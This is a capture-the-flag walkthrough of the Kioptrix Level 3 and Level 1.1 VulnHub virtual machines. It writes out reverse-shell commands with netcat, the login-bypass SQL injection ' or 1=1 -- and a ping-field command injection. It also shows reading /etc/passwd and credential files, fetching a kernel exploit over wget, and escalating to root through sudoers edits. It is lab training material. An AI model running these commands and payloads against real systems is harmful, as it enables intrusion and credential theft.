lvl-3-003

lvl-3-004

It uses LotusCMS.

Google for LotusCMS vulnerability

Found an exploitation script, let’s download it
> wget 'https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh'

Setup listener on your attacker machine
> nc -lvp 6666

Run the exploit
> ./lotusRCE.sh 192.168.117.131

Path found, now to check for vuln….

Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!

About to try and inject reverse shell….
what IP to use?
192.168.117.128
What PORT?
6666

OK, open your local listener and choose the method for back connect:

1) NetCat -e 3) NetCat Backpipe 5) Exit
2) NetCat /dev/tcp 4) NetCat FIFO
#? 1

There you go, your listener should have received a reverse shell now.

connect to [192.168.117.128] from kioptrix3.com [192.168.117.131] 57841

Check your id 
> id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Good, now you have a limited shell as user www-data.

Dump the list of users and see their home directory
> cat /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

Check out the non-standard users, such as loneferret
> cd /home/loneferret/
> ls -l

total 32
-rw-r--r-- 1 root root 224 Apr 16 2011 CompanyPolicy.README
-rwxrwxr-x 1 root root 26275 Jan 12 2011 checksec.sh

View the CompanyPolicy file
> cat CompanyPolicy.README

Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command ‘sudo ht’.
Failure to do so will result in you immediate termination.

DG
CEO

Note the hint about ‘sudo ht’; it will matter later. Now, back to the web root,
> cd /home/www/kioptrix3.com
> ls

cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php

Perform a search on any PHP files which contains “config” in the file name, maybe we can get some interesting hardcoded information from them
> find . -name '*.php' | grep config

./gallery/gconfig.php
./data/config/index.php

View the configuration file
> cat ./gallery/gconfig.php

[ … omitted]
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
[ … omitted]

We have MySQL credentials, nice. The other file, ./data/config/index.php, is empty.

The credentials are legit, login success at phpmyadmin!

lvl-3-005

Now crack the password hashes you find there with your favourite tool or an online hash lookup. You will find the following passwords,

dreg: Mast3r
loneferret: starwars

Log in to the server via SSH (remember that you are now a ‘new employee’, as mentioned in the company policy)
> ssh dreg@192.168.117.131
> sudo -l

[sudo] password for dreg:
Sorry, user dreg may not run sudo on Kioptrix3.

No luck. Let’s try the other user.

> ssh loneferret@192.168.117.131
> sudo -l

User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht

Great, loneferret is allowed to run HT Editor as root via sudo!

Run the HT Editor via sudo
> sudo /usr/local/bin/ht

From here, use the editor to open /etc/sudoers and extend what loneferret may run as root
* Press F3 to open file

lvl-3-006

Enter file name to open (reference as above)
> /etc/sudoers

lvl-3-007

Append /bin/bash to loneferret’s privilege specification so that sudo allows a shell as well (the existing line may be formatted slightly differently from what sudo -l printed), e.g.
> loneferret ALL=(root) NOPASSWD: !/usr/bin/su, /usr/local/bin/ht, /bin/bash
Keep the edit minimal: ht does not validate sudoers syntax the way visudo does, and a parse error would disable sudo entirely, including the only route we have to root.
* Press F2 to save

Now run the following to gain root access
> sudo /bin/bash
> id

uid=0(root) gid=0(root) groups=0(root)

Congrats, you are now root!

Write-up for Kioptrix: Level 1.1 (#2)

If you prefer watching a beginner friendly step-by-step walkthrough video with explanations:
VulnHub Kioptrix Level 1.1 CTF Walkthrough – Step-by-step with Explanations

This is a continuation from the Kioptrix Virtual Machines (VM) on VulnHub.

Click to view Writeup for Kioptrix level 1 (#1) VM.

lvl-2-000

Let’s get started!

Scan the network using nmap to discover hosts
> nmap -sS -T5 192.168.117.0/24

Nmap scan report for 192.168.117.130
Host is up (0.00018s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql
MAC Address: 00:0C:29:A1:02:89 (VMware)

Navigate to the website using a browser (port 80) 

lvl-2-001

There is a login form. Let’s test it for SQL injection.

Enter the following as the username (keep the space after the two dashes: MySQL only treats -- as a comment when it is followed by whitespace):

' or 1=1 -- 

And we are in!

lvl-2-002

Now let’s try the options and see if they work.

lvl-2-003

Well, it works!

Setup netcat listener on your machine, port 6666
> nc -lvp 6666

lvl-2-004

In the ping form on the target’s admin page, submit the following (refer to the image above). The semicolon ends the ping command, so the web server runs our netcat command afterwards and it connects back to the listener with a shell attached.

192.168.117.128; /usr/local/bin/nc 192.168.117.128 6666 -e /bin/sh

Observe the terminal which you are running the netcat listener

root@kali:~/Desktop/kioptrix# nc -lvp 6666
listening on [any] 6666 …
192.168.117.130: inverse host lookup failed: Unknown host
connect to [192.168.117.128] from (UNKNOWN) [192.168.117.130] 32771
id
uid=48(apache) gid=48(apache) groups=48(apache)

Now you have a shell as user apache.

Check the system kernel version
> uname -a

Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 i386 GNU/Linux

Google for vulnerability on “Linux kernel 2.6.9-55”

Check out : CVE-2009-2698, Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) – ‘ip_append_data()’ Ring0 Privilege Escalation (1)

Download the exploit code to your machine (exploit-db serves it as a file named 9542, so save it as 9542.c)
> cd /tmp
> wget 'https://www.exploit-db.com/download/9542' -O 9542.c

Serve it from the Apache instance on your attacker machine
> service apache2 start
> mv /tmp/9542.c /var/www/html/

On the target, fetch it with wget
> wget 'http://192.168.117.128/9542.c'

–23:44:28– http://192.168.117.128/9542.c
=> `9542.c’
Connecting to 192.168.117.128:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 2,645 (2.6K) [text/x-csrc]

0K .. 100% 280.27 MB/s

23:44:28 (280.27 MB/s) – `9542.c’ saved [2645/2645]

The download succeeded.

Compile your exploit on target machine
> gcc 9542.c
> ls

9542.c
a.out

Run your exploit to get root
> ./a.out

sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)

Congrats, you have gotten root.